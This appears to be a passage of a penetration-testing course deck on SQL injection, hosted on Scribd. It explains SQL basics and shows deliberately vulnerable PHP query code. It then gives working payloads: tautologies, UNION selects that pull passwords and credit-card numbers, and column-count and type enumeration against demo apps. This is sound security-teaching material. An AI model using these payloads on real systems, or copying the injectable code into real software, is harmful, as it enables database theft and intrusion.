0% found this document useful (0 votes)

41 views281 pages

4 SQL Injections

Uploaded by

abdiascompaore

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

41 views281 pages

4 SQL Injections

Uploaded by

abdiascompaore

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

You are on page 1/ 281

4.1.

Introduction to SQL Injections

4.2. Finding SQL Injections

4.3. Exploiting In-Band SQL Injections

4.4. Exploiting Error Based SQL Injections

4.5. Exploiting Blind SQL Injections

4.6. SQLMap

4.7. Mitigation Strategies

4.8. From SQLi to Server Takeover

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Penetration Testing Professional 5.0 – Caendra Inc. © 2018
An SQL Injection (SQLi) attack exploits the injection of SQL
commands into the SQL queries of a web application. A
successful SQLi attack lets a malicious hacker access and
manipulate a web application’s backend database.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Complex web applications generally use a database for
storing data, user credentials or statistics. CMSs as well as
simple personal web pages can connect to databases such as
MySQL, SQL Server, Oracle, PostgreSQL and others.

To interact with databases, entities such as systems

operators, programmers, applications and web applications
use Structured Query Language (SQL).

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

SQL is a powerful interpreted language used to extract and
manipulate data from a database. Web applications embed
SQL commands, also known as queries, in their server side
code.
The code takes care of establishing and keeping the
connection to the database by using connectors. Connectors
are middle-ware between the web application and the
database.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Connector Example:

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Before learning how to carry out an attack, we have to know
some SQL basics:
• SQL statements syntax
• How to perform a query
• How to union the results of two queries
• The DINSTINCT and ALL operators
• How comments work

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

A SQL statement looks like the following:
Example:

> SELECT name, description FROM products WHERE id=9;

The above code queries the database, asking for the name
and the description of a record in the products table. In
this example, the selected record will have id value equal 9.
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
In order to better understand SQLi you need to know the
basic syntax of a SELECT statement:

> SELECT <columns list> FROM <table> WHERE <condition>;

You can find more information about SQL here.

https://www.w3schools.com/sql/sql_intro.asp

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

It is also possible to select constant values:
Example:

> SELECT 22, 'string', 0x12, 'another string';

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

You also need to know the UNION command, which performs
a union between two results, operates:

> <SELECT statement> UNION <other SELECT statement>;

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

If a table or query contains duplicate rows, you can use the
DISTINCT operator to filter out duplicate entities:

> SELECT DISTINCT <field list> <remainder of the statement>;

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

A UNION statement implies DISTINCT by default. You can
prevent that by using the ALL operator:

> <SELECT statement> UNION ALL <other SELECT statement>;

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Finally a word about comments. There are two strings you
can use to comment a line in SQL:
• # (the hash symbol)
• -- (two dashes followed by a space)

> SELECT field FROM table; # this is a comment

> SELECT field FROM table; -- this is another comment

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Example:
In the following slides, we will see some SQL queries
performed on a database containing two tables:
Products
Accounts
ID Name Description
Username Password Email
1 Shoes Nice shoes
admin HxZsO9AR [email protected]
3 Hat Black hat
staff ihKdNTU4 [email protected]
18 T-Shirt Cheap
user Iwsi7Ks8 [email protected]

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

• The following two queries provide the same result:
> SELECT Name, Description FROM Products WHERE ID='1';

> SELECT Name, Description FROM Products WHERE Name='Shoes';

• The result of the queries is a table containing just one

row:
Name Description

Shoes Nice shoes

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

• This is a UNION example between two SELECT statements:
> SELECT Name, Description FROM Products WHERE ID='3' UNION SELECT
Username, Password FROM Accounts;

• The result of the query is a table containing a row with the Hat
item and all the usernames and passwords from the Accounts
table:
Name Description
Hat Black hat
admin HxZsO9AR
staff ihKdNTU4
user Iwsi7Ks8
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
• You can also perform a UNION operation with some
chosen data:
> SELECT Name, Description FROM Products WHERE ID='3' UNION SELECT
'Example', 'Data';

• The result of the query is a table containing a row with the

Hat item and the provided custom row:
Name Description
Hat Black hat
Example Data

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

The previous examples show how to use SQL when querying a
database directly from its console.
To perform the same tasks from within a web application, the
application must:
• Connect to the database
• Submit the query to the database
• Retrieve the results
Then the application logic can use the results.
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
The following code contains a PHP example of a connection
to a MySQL database and the execution of a query.
Example:

$dbhostname='1.2.3.4';
$dbuser='username';
$dbpassword='password';
$dbname='database';

$connection = mysqli_connect($dbhostname, $dbuser, $dbpassword, $dbname);

$query = "SELECT Name, Description FROM Products WHERE ID='3' UNION SELECT Username,
Password FROM Accounts;";

$results = mysqli_query($connection, $query);

display_results($results);

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

The previous example shows a static query example inside a
PHP page:
• $connection is an object referencing the connection to
the database.
• $query contains the query.
• mysqli_query() is a function which submits the query to
the database.
• Finally the custom display_results() function renders
the data.
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
• Anatomy of a database interaction in PHP. This example
uses a MySQL database.
$dbhostname='1.2.3.4';
Configuration
$dbuser='username';
$dbpassword='password'; Connection
$dbname='database';

$connection = mysqli_connect($dbhostname, $dbuser, $dbpassword, $dbname);

$query = "SELECT Name, Description FROM Products WHERE ID='3' UNION SELECT
Username, Password FROM Accounts;";
Query
$results = mysqli_query($connection, $query);
definition
display_results($results);
Submit
Usage
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
However, most of the times queries are not static, they are
dynamically built by using the user‘s inputs. Here you can
find a vulnerable dynamic query example:
Example:

$id = $_GET['id'];

$connection = mysqli_connect($dbhostname, $dbuser, $dbpassword, $dbname);

$query = "SELECT Name, Description FROM Products WHERE ID='$id';";

$results = mysqli_query($connection, $query);

display_results($results);

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

The previous example shows some code which uses user
supplied input to build a query (the id parameter of the GET
request). The code then submits the query to the database.
Although the code is functionally correct, this behavior is very
dangerous, because a malicious user can exploit the query
construction to take control of the database interaction.
Let us see how!

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

The dynamic query:

SELECT Name, Description FROM Products WHERE ID='$id';

Expects $id values such as:

• 1 SELECT Name, Description FROM Products WHERE ID='1';
• Example SELECT Name, Description FROM Products WHERE ID='Example';
• Itid3 SELECT Name, Description FROM Products WHERE ID='Itid3';
Or any other string.
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
But, what if an attacker crafts a $id value which can actually
change the query? Something like:

' OR 'a'='a

Then the query becomes:

SELECT Name, Description FROM Products WHERE ID='' OR 'a'='a';

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

This tells the database to select the items by checking two
conditions:
• The id must be empty (id='')
• OR an always true condition ('a'='a')
While the first condition is not met, the SQL engine will
consider the second condition of the OR. This second
condition is crafted as an always true condition.
In other words, this tells the database to select all the items
in the Products table!
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
An attacker could also exploit the UNION command by
supplying:

' UNION SELECT Username, Password FROM Accounts WHERE 'a'='a

Thus changing the original query to:

SELECT Name, Description FROM Products WHERE ID='' UNION SELECT

Username, Password FROM Accounts WHERE 'a'='a';

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

This asks the database to select the items with an empty id,
thus selecting an empty set, and then to perform a union
with all the entries in the Accounts table.

By using some deep knowledge about the database

management system in use, an attacker can get access to the
entire database just by using a web application.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Before going deeper into the “find and exploit process” of
SQL injection vulnerabilities, you should understand where
these vulnerabilities can lead when they are successfully
exploited.
First, we have to understand that based on the DBMS that the
web application is using (MySQL, SQL Server…) , the attacker
is capable of performing a number of actions that go much
further than the mere manipulation of the database.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

An attacker could read the file system, run OS commands,
install shells, access the remote network and basically own
the whole infrastructure.
This is not always the case however, as we will see later, the
more powerful the DBMS, the more advanced the SQL is.
This increases the capabilities of an attacker after the
exploitation.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Keep in mind that accessing a database that stores
confidential data (user credentials, SSNs, credit cards and
whatever sensitive information an enterprise, company or
individual may store in a database) is the single most
dangerous form of attack on a web application.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Among all the vulnerabilities that may affect web
applications, SQL injections are the first checked by hackers
because of the fact that they produce the most immediate
results.
Example:

An XSS attack involves some steps, intelligence and

planning for its successful exploitation. A SQL
injection vulnerability, once found, is ready to be
exploited.
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
There is a a great deal of literature about SQLi and there are
many different types of classifications, each one based on
different aspects such as:
• Scope of the attack
• Exploitation vector
• Source of the attack

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

In this course we will refer 3 different injection attacks and
exploitation types:
• In-band
• Error-based
• Blind SQL
These classifications are based on the exploitation method
used to carry out the attack. This will help you follow the
explanations of the detection and exploitation phases. Now
let’s see it in detail!
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
In-band SQL injections leverage the same channel used to
inject the SQL code (i.e. the pages generated by the web
application).

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Example:

During and an in-band attack the penetration tester finds a

way to ask the the web application for the desired
information.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

During an Error-Based SQL injection attack, the penetration
tester tries to force the DMBS to output an error message
and then uses that information to perform data exfiltration.

Error
Management
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
Example:
To exploit an error-based injection, the penetration tester needs to
use advanced DBMS features. Errors could be sent either via the
web application output or by other means such us automated
reports or warning emails.

Error
Management
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
A web application vulnerable to blind SQL injection does not
reflect the results of the injection on the output. In this case
the penetration tester must find an inference method to
exploit the vulnerability.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Example:

Inference exploitation is usually carried out by using

true/false conditions.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Example:

The penetration tester can understand if a condition is true or

false by studying the web application behavior.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Now, we will see how to detect and exploit various SQL
injection vulnerabilities in the few next sections of this
module.

Don’t worry!!
Everything you have just seen will all fall into place!

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Penetration Testing Professional 5.0 – Caendra Inc. © 2018
To exploit an SQL injection you have to first find out where
the injection point is, then you can craft a payload to take
control over your target’s dynamic query.

The most straightforward way to find SQL injections within a

web application is to probe its inputs with characters that are
known to cause the SQL query to be syntactically invalid and
thus forcing the web application to return an error.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Note: Not all the inputs of a web application are used to build
SQL queries. In the Information Gathering module, we
suggested that you categorize the different input parameters
and save the ones used for database data retrieval and
manipulation.

In the following slides, we will see how to use the information

gathered to identify and exploit SQLi vulnerabilities.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Input parameters are carried through: GET and POST
requests, HEADERS and COOKIES. We have to check all these
channels where data is retrieved from the client.

The following examples, for the sake of simplicity, will

examine scenarios where inputs are taken straight from the
URL (with the GET method). The same techniques apply to
the other channels.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

For the purpose of explaining the process of finding SQL
Injections, we created a small (vulnerable) e-commerce web
application showcasing cell phones for sale.

Example:

ecommerce.php takes an input parameter named

id that reads the product features from the
database and prints them out on the page.
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
• The id parameter is expected to be an integer. Sending
the id=1 GET parameter makes the application behave
correctly.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

• While sending a comma however, makes the application
throw an error.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

• Testing input for SQL injection means trying to inject:
• String terminators: ' and "
• SQL commands: SELECT, UNION and others
• SQL comments: # or --
And checking if the web application starts to behave oddly.
Always test one injection at a time! Otherwise you will not
be able to understand what injection vector is successful.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

The web application we have just seen, prints internal errors
on its output pages.

This behavior helps developers and penetration testers to

understand what is going on under the hood of a web
application.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Every DBMS responds to incorrect SQL queries with different
error messages.
Even within the same DBMS, error messages change
according to the specific function the web application uses to
interact with it.
Example:

In the previous example we saw the

mysql_fetch_assoc() function triggering an
error due to our invalid input.
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
• A typical error from MS-SQL looks like this:

Incorrect syntax near [query snippet]

• While typical MySQL error looks more like this:

You have an error in your SQL syntax. Check the manual that
corresponds to your MySQL server version for the right syntax to
use near [query snippet]

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

If, during an engagement, you find errors similar to the
previous ones, it is very likely that the application is
vulnerable to an SQL injection attack.

This is not always the case, sometimes you have to have

educated guesses in order to understand if a web app is
vulnerable or not.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Currently, most production web sites do not display such
errors.

This happens both because of the usability of the application,

it is useless to display errors to end users who cannot
understand or fix them, and to achieve security through
obscurity.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Security through obscurity is the use of secrecy of design,
implementation or configuration in order to provide security.
In the following slides you will see how this approach cannot
defend a vulnerable application from SQL injection attacks.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

If a web application does not display errors in its output, it is
still possible to test for SQL injection by using a Boolean
based detection technique.
The idea behind this process is simple, yet clever: trying to
craft payloads which transform the web application queries
into True/False conditions. The penetration tester then can
infer the results of the queries by looking at how the
application behavior changes with different True/False
conditions.
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
Example:
To demonstrate how to detect a Boolean based SQLi, we
created a website hosting an image gallery. Every images has
an ID that identifies it.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

• As usual, we try to detect the injection point by sending
the web application SQL-reserved characters. In this
example, a string termination character. The result is: The
web application does not display an image.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

• Unfortunately, the application behaves in the same way
when we ask for an image that simply does not exist. For
example if we pass id=999999 as GET parameter:

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

• We suspect that the query behind the page is something
like
SELECT <some fields> FROM <some table> WHERE id='GETID';

• So we can try to inject 999999' or '1'='1 to transform the

query into:
SELECT <some fields> FROM <some table> WHERE id='999999 or '1'='1';

Which basically is an always true condition!

Penetration Testing Professional 5.0 – Caendra Inc. © 2018
• Testing this payload on the web application gives us back
an output! To be sure, we also need to test an always false
condition.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

• We then change our payload to 999999' or '1'='2
which is an always false condition.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

• It is also possible to test a little more with other always
true or always false conditions such as:
• 1141' and 'els'='els
• 1141' and 'els'='elsec
• 1141' and 'hello'='hello
• 1141' and 'hello'='bye
• els' or '1'='1
• els' or '1'='2

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

After detecting a potential injection point, it is time to test if
it is actually exploitable.
In the following chapters, you will see different techniques to
exploit SQL injection vulnerabilities.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

In the next video you will see how to identify SQL injection
vectors.
You will see how to use Boolean logic injections to test
vulnerable parameters and use SQLMap to perform basic SQLi
exploitation.

We will also see, in detail, how to use SQL later in this

module.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Penetration Testing Professional 5.0 – Caendra Inc. © 2018
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
In-band SQL injection techniques make the retrieval of data
from the database very powerful thanks to the use of the
UNION SQL command. For this reason, in-band injections are
also known as UNION-based SQL injections.

This kind of attack lets a penetration tester extract the

database content, in the form of the database name, tables
schemas and actual data.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

As we have seen in the first chapter of this module, the
UNION statement combines the result-set of two or more
SELECT statements.
Example:

SELECT <field list> FROM <table> UNION SELECT <field list> FROM <another table>;

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

We will see how to exploit an in-band SQL injection by
studying some scenarios. In the first scenario the database
contains two tables: CreditCards and Users.
CreditCards
id (int) username (string) password (string) real_name (string)
1 admin strongpass123 Armando Romeo
2 fred wowstrongpass123 Fred Flintstone

Users
user_id (int) Cc_num (int) CVS(int)
1 0000 1111 2222 3333 123
2 0123 4567 8901 2345 321

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

The user_id column is the foreign key of the Users table.
In this example admin has a credit card number of 0000
1111 2222 3333 while fred has a credit card number of
0123 4567 8901 2345.
CreditCards
id (int) username (string) password (string) real_name (string)
1 admin strongpass123 Armando Romeo
2 fred wowstrongpass123 Fred Flintstone

Users
user_id (int) Cc_num (int) CVS(int)
1 0000 1111 2222 3333 123
2 0123 4567 8901 2345 321

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

The web application uses the following code to display
usernames:

<?php
$rs=mysql_query("SELECT real_name FROM users WHERE id=".$_GET['id'].";");
$row=mysql_fetch_assoc($rs);

echo $row['real_name'];
?> SQL injection!

As you can see, there is a clear SQL injection point in the id

field of the SQL query.
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
We can now exploit the SQLi vulnerability to retrieve the
credit card associated with a username.
Our payload is:

9999 UNION ALL SELECT cc_num FROM CreditCards WHERE user_id=1

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

The payload makes the query in the web application
transform into the following:

SELECT real_name FROM users WHERE id=9999 UNION ALL SELECT

cc_num FROM CreditCards WHERE user_id=1;

As there are no users with id=9999 the web application

will display on its output the cc_num of the first user!

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

We can now submit the payload to the web application by
sending a GET request with either the browser or, via a
different tool:

/vuln_to_inband.php?id=9999 UNION ALL SELECT cc_num FROM

CreditCards WHERE user_id=1

Note the use of the ALL operator. We used it to avoid the

effect of an eventual DISTINCT clause in the original web
application query.
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
Another good trick to use when exploiting a SQL injection
vulnerability is to use comments. A payload such as:

9999 UNION ALL SELECT cc_num FROM CreditCards WHERE user_id=1; -- -

Query termination and comment

This comments out any other SQL code which could follow
our injection point.
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
There are many things to note in the previous attack:
• The field types of the second SELECT statement should match
the ones in the first statement
• The number of fields in the second SELECT statement should
match the number of the fields in the first statement
• To successfully perform the attack, we need to know the
structure of the database in terms of tables and column
names

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

To solve the first two issues, we can use an advanced
technique to find what columns are used in a SELECT
statement. We are looking for the number of columns and
their type.

We will see how to reverse-engineer the database structure

later. In the following examples we assume that we know the
structure of the database.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Let us see how to enumerate the number of columns, or
fields, in query selects. The following line contains the
vulnerable query:
mysql_query("SELECT id, real_name FROM users WHERE id=".$GET['id'].";");

The columns have the following data types:

• id has data type int
• real_name has data type varchar (a string)

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

In this case, the query selects two columns with type integer
and varchar.
As most engagements are black-box penetration tests, we
need a way to find:
• Number of columns a vulnerable query selects
• The data type of each column

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Finding the number of fields in a query is a cyclical task.

If we do not provide the correct number of fields in the

injected query, it will not work. This will throw an error on the
web application output or simply mess up the contents of the
output page rendering.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

If the web application outputs an error, please note that
every DBMS outputs a different error string:

• MySQL error:
The used SELECT statements have a different number of columns

MS SQL error:
All queries in an SQL statement containing a UNION operator
must have an equal number of expressions in their target
lists

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

• PostgreSQL error:

ERROR: each UNION query must have the same number of columns

• Oracle error:

ORA-01789: query block has incorrect number of result columns

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

We start by injecting a query that selects null fields. We start
with a single field and then increase the number of fields until
we build a valid query.
Example:
Detecting the number of fields needed to exploit an in-
band SQL injection looks like the following:
1• 9999 UNION SELECT NULL; -- -
2• 9999 UNION SELECT NULL, NULL; -- -
n• ...
4• 9999 UNION SELECT NULL, NULL, NULL, NULL; -- -

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

We can iteratively add null fields until the error disappears.
This will force the web application to execute the following
queries:
• SELECT id, real_name FROM users WHERE id='9999'
UNION SELECT NULL; -- -
Which triggers an error (the left hand query selects two fields
while the right hand query selects just one field)
• SELECT id, real_name FROM users WHERE id='9999'
UNION SELECT NULL, NULL; -- -
Which works without triggering an error (the two statements
are balanced)
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
However, what about a web application that does not display
errors?
The basic idea is similar (increasing the number of fields at
every step) but, in this case we want to start with a valid id
and then inject our query.
As we did before, we increase the number of fields selected
until we create a valid query.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Example:

The view.php page displays

a picture with id 1138.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

We try to inject a query with
a single field.

The payload is:

1138' UNION SELECT null; -- -

The page is not rendered

correctly, there must be an
error in the query.
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
We increase the number of
fields.

The payload is:

1138' UNION SELECT null,null; -- -

The page now works, this

means that the query is
correct.
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
• With our last payload we forced the web application to
run the following query:

SELECT field1, field2 FROM table where id='1138' UNION SELECT null, null; -- -
<remainder of the original query>

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

After identifying the number of fields, we need to find their
type. Most of the DBMSs perform type enforcing on the
queries.
Example:

If the DBMS performs type enforcing on UNION statements you

cannot perform a UNION between an integer and a string therefore,
SELECT 1 UNION 'a';
will trigger an error!
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
Depending on how the DBMS handles data types, we are
required to provide an exact match of the data types for each
column in the two SELECT statements.
DBMS Type Enforcing
MySQL No
MS SQL Server Yes
Oracle Yes
PostgreSQL Yes

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Finding the data types used in the queries is, once again, a
cyclical process. We have to:
• Substitute one of the null fields in our payload with a
constant
• If the constant type used is correct, the query will work
• If the type is wrong the web application will output an
error or misbehave
In the next example we will try to find the data types used in
a query.
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
Example:

We found an in-band SQL injection with two fields. Our

current payload is:
' UNION SELECT null, null; -- -

So we try to test if the first field is an integer by sending:

' UNION SELECT 1, null; -- -

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

• If the web application works correctly we can assume that
the first field is an integer so we proceed from:
' UNION SELECT 1, null; -- -

• To:

' UNION SELECT 1, 1; -- -

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

• If we get an error, or the application misbehaves, then the
second field is not an integer therefore, we can move on
to:

' UNION SELECT 1, 'a'; -- -

As we see for this example, the second field is a string!

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

After finding out the number of columns and their types, it is
possible to extract information about the database, the
server and the database data.

We will see how to use specific DBMS features to extract this

information later. Let us first cover other exploitation
techniques.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

In this video you will see how to manually exploit in-band
SQL injections!
You will see how to:
• Find the number of fields in a query
• Find their type
• Inject attacker-controlled queries

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Penetration Testing Professional 5.0 – Caendra Inc. © 2018
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
Error-based SQL injections are another way to retrieve data
from the database. While they do not ask for data directly,
they actually use some advanced DBMS functions to trigger
an error. The error message contains the information the
penetration tester is aiming for.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Most of the times the error message is reflected on the web
application output but, it could also be embedded in an email
message or appended to a log file. It depends on how the
web application is configured.

Error-based SQL injection is one of the fastest ways to extract

data from a database. It is available on DMBSs such us Oracle,
PostgreSQL and MS SQL Server.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Some DBMSs are very generous in terms of information given
within error messages. In some of the previous examples, we
used errors to match conditions of success or failure.

This time, we’ll retrieve database names, schemas and data

from the errors, themselves. We will see some MS SQL Server
specific payloads and then introduce some attack vectors for
other DBMSs. The basic principle is the same across any
DBMS.
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
MS SQL Server reveals the name of database objects within
error messages. Let us see it in action!

We ported our vulnerable e-commerce application to

ASP+MSSQL to show the process of dumping the whole
database schema and data manually.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

The schemas are databases with the singular purpose of
describing all the other user-defined databases in the system.

In MSSQL, sa is the super admin and has access to the master

database. The master database contains schemas of user-
defined databases.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

The first piece of information we would like to know is the
database version so that we can build our exploits
accordingly.

To do this we will force the DBMS to show an error including

the database version.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

One of the most used tricks is to trigger a type conversion
error that will reveal to us the wanted value.
From now on we will refer to this scenario:
• DBMS is MS SQL Server
• The vulnerable app is ecommerce.asp?id=1
• The id parameter is vulnerable to SQLi